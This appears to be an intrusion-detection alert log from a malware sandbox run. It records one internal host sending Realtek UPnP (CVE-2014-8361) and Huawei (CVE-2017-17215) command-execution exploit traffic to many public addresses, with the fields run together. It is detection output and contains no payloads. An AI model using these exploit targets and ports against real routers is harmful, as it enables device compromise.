                                      07/20/24-23:01:44.059102TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614412852869192.168.2.23147.163.143.195
                                      07/20/24-23:01:24.943244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223837215192.168.2.23197.88.128.116
                                      07/20/24-23:01:42.434719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4500852869192.168.2.2350.3.243.177
                                      07/20/24-23:01:43.874054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3530052869192.168.2.2312.215.198.66
                                      07/20/24-23:01:48.118060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614953452869192.168.2.23192.178.20.121
                                      07/20/24-23:00:57.220937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422237215192.168.2.2337.80.86.165
                                      07/20/24-23:00:57.221727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.23157.6.221.99
                                      07/20/24-23:01:49.775041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4810252869192.168.2.2375.33.175.78
                                      07/20/24-23:01:04.601975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4738252869192.168.2.2387.137.214.123
                                      07/20/24-23:01:24.886284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631637215192.168.2.23197.12.62.22
                                      07/20/24-23:01:42.485253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615454652869192.168.2.23194.5.145.232
                                      07/20/24-23:01:41.290518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613940252869192.168.2.2353.176.94.191
                                      07/20/24-23:01:03.060799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6040252869192.168.2.2314.23.231.227
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332437215192.168.2.23197.124.214.37
                                      07/20/24-23:01:43.918790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5811252869192.168.2.2317.63.153.183
                                      07/20/24-23:01:14.095462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108237215192.168.2.23157.9.117.101
                                      07/20/24-23:01:34.044538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842237215192.168.2.23197.183.243.219
                                      07/20/24-23:01:25.974900TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613923252869192.168.2.2384.102.198.205
                                      07/20/24-23:01:04.049279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907237215192.168.2.23197.206.59.160
                                      07/20/24-23:01:42.745085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308852869192.168.2.23192.59.76.250
                                      07/20/24-23:01:44.469869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3563652869192.168.2.23155.71.120.47
                                      07/20/24-23:01:47.108019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312852869192.168.2.23124.217.174.35
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823237215192.168.2.2341.67.206.241
                                      07/20/24-23:01:27.725851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922237215192.168.2.23197.46.153.191
                                      07/20/24-23:01:44.142024TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615807052869192.168.2.23156.254.5.127
                                      07/20/24-23:01:48.047800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23302652869192.168.2.2363.140.14.0
                                      07/20/24-23:01:44.052569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592652869192.168.2.23108.48.65.201
                                      07/20/24-23:01:47.485617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5501652869192.168.2.23156.42.244.253
                                      07/20/24-23:01:14.296756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307037215192.168.2.23177.10.233.116
                                      07/20/24-23:01:44.945909TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613885452869192.168.2.2386.24.154.203
                                      07/20/24-23:01:11.817297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085837215192.168.2.2341.198.81.15
                                      07/20/24-23:01:57.720327TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614988052869192.168.2.2370.7.126.6
                                      07/20/24-23:01:47.163877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3845252869192.168.2.23191.56.81.141
                                      07/20/24-23:01:47.748808TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613330852869192.168.2.23145.1.23.220
                                      07/20/24-23:01:45.143033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613725052869192.168.2.2357.114.247.43
                                      07/20/24-23:02:04.476708TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615561652869192.168.2.23181.63.38.118
                                      07/20/24-23:01:49.741351TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614286652869192.168.2.23155.107.33.68
                                      07/20/24-23:01:57.655207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614770652869192.168.2.23219.253.193.1
                                      07/20/24-23:01:43.498156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614755052869192.168.2.2345.122.145.145
                                      07/20/24-23:01:53.099889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6037052869192.168.2.2381.96.129.112
                                      07/20/24-23:01:08.677189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25418052869192.168.2.23141.31.223.242
                                      07/20/24-23:01:54.277123TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613637652869192.168.2.2318.232.199.152
                                      07/20/24-23:01:55.994693TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25377452869192.168.2.23210.209.80.73
                                      07/20/24-23:01:58.751559TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4683052869192.168.2.232.29.217.143
                                      07/20/24-23:00:57.221248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404037215192.168.2.2341.242.31.133
                                      07/20/24-23:01:43.147883TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5957852869192.168.2.23170.93.66.190
                                      07/20/24-23:01:31.312736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4559052869192.168.2.23111.38.32.209
                                      07/20/24-23:01:43.023857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4507452869192.168.2.2349.238.106.168
                                      07/20/24-23:01:42.497728TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3792452869192.168.2.23118.3.222.239
                                      07/20/24-23:01:00.654988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058437215192.168.2.2341.215.110.81
                                      07/20/24-23:02:01.645032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371252869192.168.2.2313.93.47.50
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952837215192.168.2.23157.66.219.47
                                      07/20/24-23:01:56.579360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3933652869192.168.2.23120.153.158.217
                                      07/20/24-23:01:50.845923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25597852869192.168.2.2392.64.232.40
                                      07/20/24-23:01:13.157651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4367252869192.168.2.23217.255.100.151
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499237215192.168.2.2341.134.147.250
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552837215192.168.2.23210.132.156.163
                                      07/20/24-23:01:03.077930TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614213052869192.168.2.23155.22.90.90
                                      07/20/24-23:01:14.049602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758837215192.168.2.23222.200.88.35
                                      07/20/24-23:01:44.945909TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4205052869192.168.2.23153.239.16.237
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496437215192.168.2.23197.33.180.41
                                      07/20/24-23:01:08.575986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5764252869192.168.2.23162.63.105.168
                                      07/20/24-23:01:07.016889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500237215192.168.2.23157.198.64.39
                                      07/20/24-23:01:44.944836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5154852869192.168.2.23151.41.38.224
                                      07/20/24-23:01:53.237113TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615122652869192.168.2.23160.211.55.1
                                      07/20/24-23:01:55.666677TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24177452869192.168.2.23125.67.244.75
                                      07/20/24-23:01:40.301143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634237215192.168.2.23165.249.91.251
                                      07/20/24-23:02:08.291319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4448852869192.168.2.2344.124.10.6
                                      07/20/24-23:01:31.326982TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432052869192.168.2.23112.202.108.197
                                      07/20/24-23:01:56.239090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614149252869192.168.2.23164.216.95.45
                                      07/20/24-23:01:31.974551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904037215192.168.2.2341.130.110.142
                                      07/20/24-23:01:46.159166TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26032852869192.168.2.23111.211.116.144
                                      07/20/24-23:01:43.180913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3362052869192.168.2.23125.185.15.217
                                      07/20/24-23:01:26.145029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3332652869192.168.2.23121.166.138.14
                                      07/20/24-23:01:42.474339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613705852869192.168.2.2371.221.213.203
                                      07/20/24-23:01:14.366797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613379452869192.168.2.2361.157.174.11
                                      07/20/24-23:01:41.431519TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616039052869192.168.2.23147.68.197.111
                                      07/20/24-23:01:42.477986TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613937452869192.168.2.2382.79.140.185
                                      07/20/24-23:02:48.447183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614971852869192.168.2.23204.115.21.200
                                      07/20/24-23:01:25.589558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463037215192.168.2.23197.200.133.254
                                      07/20/24-23:00:57.221624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636637215192.168.2.23197.221.173.151
                                      07/20/24-23:01:44.971718TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615447852869192.168.2.23136.252.196.177
                                      07/20/24-23:01:43.087294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614878852869192.168.2.2376.8.56.105
                                      07/20/24-23:01:44.398920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3429252869192.168.2.23168.75.18.77
                                      07/20/24-23:01:45.453485TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613419652869192.168.2.2349.79.18.186
                                      07/20/24-23:01:51.963339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4080452869192.168.2.2367.67.248.34
                                      07/20/24-23:01:01.469737TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433652869192.168.2.2324.167.37.167
                                      07/20/24-23:01:48.701126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3850052869192.168.2.2348.211.124.159
                                      07/20/24-23:01:31.975158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760037215192.168.2.23157.158.210.182
                                      07/20/24-23:01:44.362240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5943652869192.168.2.2366.43.237.112
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005437215192.168.2.2338.187.179.55
                                      07/20/24-23:01:01.628180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5379852869192.168.2.2394.221.100.187
                                      07/20/24-23:01:52.081188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4007652869192.168.2.232.18.140.250
                                      07/20/24-23:01:41.909668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3713852869192.168.2.2358.43.60.192
                                      07/20/24-23:01:42.962388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614280652869192.168.2.23189.200.249.59
                                      07/20/24-23:01:42.706162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613624652869192.168.2.23137.51.1.150
                                      07/20/24-23:01:01.623383TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615612252869192.168.2.2334.53.37.254
                                      07/20/24-23:01:24.943244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741637215192.168.2.23197.211.52.185
                                      07/20/24-23:01:02.047411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278437215192.168.2.2383.22.51.58
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472837215192.168.2.2341.232.178.1
                                      07/20/24-23:01:43.478924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4355452869192.168.2.23113.10.123.41
                                      07/20/24-23:01:43.239928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613679652869192.168.2.23185.111.137.113
                                      07/20/24-23:01:45.350108TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25711052869192.168.2.23179.57.28.204
                                      07/20/24-23:01:45.143033TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23423852869192.168.2.23219.30.72.57
                                      07/20/24-23:01:47.692209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4068852869192.168.2.235.36.69.33
                                      07/20/24-23:01:50.370395TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613959852869192.168.2.23206.37.245.255
                                      07/20/24-23:01:42.280418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5474852869192.168.2.2375.163.230.218
                                      07/20/24-23:01:43.282556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615739852869192.168.2.23202.1.176.48
                                      07/20/24-23:01:47.995637TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25493052869192.168.2.2317.78.214.126
                                      07/20/24-23:01:45.489343TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24645252869192.168.2.2350.90.160.227
                                      07/20/24-23:01:43.199406TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304452869192.168.2.23192.54.139.100
                                      07/20/24-23:01:10.703412TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614147852869192.168.2.23185.44.122.49
                                      07/20/24-23:01:44.546338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25795452869192.168.2.23203.253.92.60
                                      07/20/24-23:01:59.738271TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24464052869192.168.2.2335.61.70.96
                                      07/20/24-23:01:52.001138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614136452869192.168.2.239.230.247.23
                                      07/20/24-23:01:02.104572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433237215192.168.2.2341.132.238.252
                                      07/20/24-23:01:43.039504TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23793852869192.168.2.2340.50.75.236
                                      07/20/24-23:01:58.216922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4996652869192.168.2.23187.61.181.140
                                      07/20/24-23:01:48.369883TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5301852869192.168.2.23202.109.173.165
                                      07/20/24-23:02:11.791090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615092052869192.168.2.2391.117.171.160
                                      07/20/24-23:01:42.656963TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24082452869192.168.2.23129.151.175.195
                                      07/20/24-23:02:00.056416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614361452869192.168.2.23147.8.193.70
                                      07/20/24-23:01:21.936545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099637215192.168.2.23157.58.196.213
                                      07/20/24-23:01:54.702517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613359252869192.168.2.2383.238.5.172
                                      07/20/24-23:01:41.280927TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614579852869192.168.2.23187.89.64.185
                                      07/20/24-23:01:42.592254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5997252869192.168.2.2349.57.98.237
                                      07/20/24-23:01:47.632780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5335052869192.168.2.2341.48.241.197
                                      07/20/24-23:01:44.894920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25683252869192.168.2.23149.227.25.96
                                      07/20/24-23:01:11.630649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363037215192.168.2.23197.208.141.188
                                      07/20/24-23:01:21.936545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550237215192.168.2.23157.80.129.250
                                      07/20/24-23:01:46.985099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5173852869192.168.2.2323.8.251.245
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842237215192.168.2.2341.227.71.109
                                      07/20/24-23:01:46.254249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4088252869192.168.2.2387.152.13.65
                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344637215192.168.2.2341.117.151.237
                                      07/20/24-23:01:41.882275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3457252869192.168.2.23192.18.152.238
                                      07/20/24-23:01:44.099658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953652869192.168.2.2390.126.99.183
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545837215192.168.2.2323.105.53.195
                                      07/20/24-23:02:02.527007TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23987652869192.168.2.23217.255.162.70
                                      07/20/24-23:01:51.888686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101652869192.168.2.2341.47.146.130
                                      07/20/24-23:00:59.158279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706037215192.168.2.23157.30.105.107
                                      07/20/24-23:01:43.096223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4899652869192.168.2.2375.199.56.180
                                      07/20/24-23:01:53.937783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3615052869192.168.2.23188.131.252.163
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484237215192.168.2.23166.117.175.116
                                      07/20/24-23:01:08.563906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083252869192.168.2.23191.79.195.70
                                      07/20/24-23:01:58.031141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615437052869192.168.2.2368.209.51.160
                                      07/20/24-23:01:43.118475TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569852869192.168.2.23151.149.108.97
                                      07/20/24-23:02:05.506482TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614727252869192.168.2.2375.15.32.116
                                      07/20/24-23:01:11.633481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311437215192.168.2.23197.132.172.129
                                      07/20/24-23:01:44.349550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4107852869192.168.2.23202.203.199.212
                                      07/20/24-23:01:43.266134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613339652869192.168.2.23219.30.72.57
                                      07/20/24-23:01:52.543362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5820852869192.168.2.2383.201.129.18
                                      07/20/24-23:01:01.886452TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615191852869192.168.2.23105.234.100.63
                                      07/20/24-23:01:47.700893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613808452869192.168.2.2392.55.62.242
                                      07/20/24-23:01:44.469580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3384852869192.168.2.2339.189.20.84
                                      07/20/24-23:01:50.848727TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615354052869192.168.2.23155.90.77.175
                                      07/20/24-23:01:21.928521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799837215192.168.2.23157.74.212.139
                                      07/20/24-23:01:44.996260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987852869192.168.2.23190.104.185.79
                                      07/20/24-23:02:16.647796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4965052869192.168.2.23114.52.153.70
                                      07/20/24-23:01:04.114673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870237215192.168.2.2341.9.233.106
                                      07/20/24-23:01:02.365539TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615040052869192.168.2.23114.20.70.247
                                      07/20/24-23:01:42.189694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5217252869192.168.2.23128.242.86.47
                                      07/20/24-23:01:40.285039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493837215192.168.2.23197.32.142.171
                                      07/20/24-23:01:59.905375TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24426052869192.168.2.23112.175.144.226
                                      07/20/24-23:01:07.036064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724237215192.168.2.2341.85.228.41
                                      07/20/24-23:01:41.374418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613896652869192.168.2.23150.125.163.90
                                      07/20/24-23:01:52.144379TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25662452869192.168.2.2392.182.23.52
                                      07/20/24-23:00:57.221132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717437215192.168.2.23157.233.134.27
                                      07/20/24-23:01:53.537092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26053452869192.168.2.23167.207.100.170
                                      07/20/24-23:01:51.683848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989452869192.168.2.23201.63.23.173
                                      07/20/24-23:01:49.011895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4395052869192.168.2.2359.76.186.58
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992237215192.168.2.2341.65.35.124
                                      07/20/24-23:01:45.432263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23804052869192.168.2.23199.44.188.95
                                      07/20/24-23:01:55.423260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613299052869192.168.2.2337.133.189.92
                                      07/20/24-23:01:07.075937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514637215192.168.2.2341.83.154.226
                                      07/20/24-23:01:08.598416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24101452869192.168.2.2325.222.87.118
                                      07/20/24-23:01:52.701293TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25337652869192.168.2.2361.27.196.68
                                      07/20/24-23:02:36.102280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4629652869192.168.2.2368.53.164.7
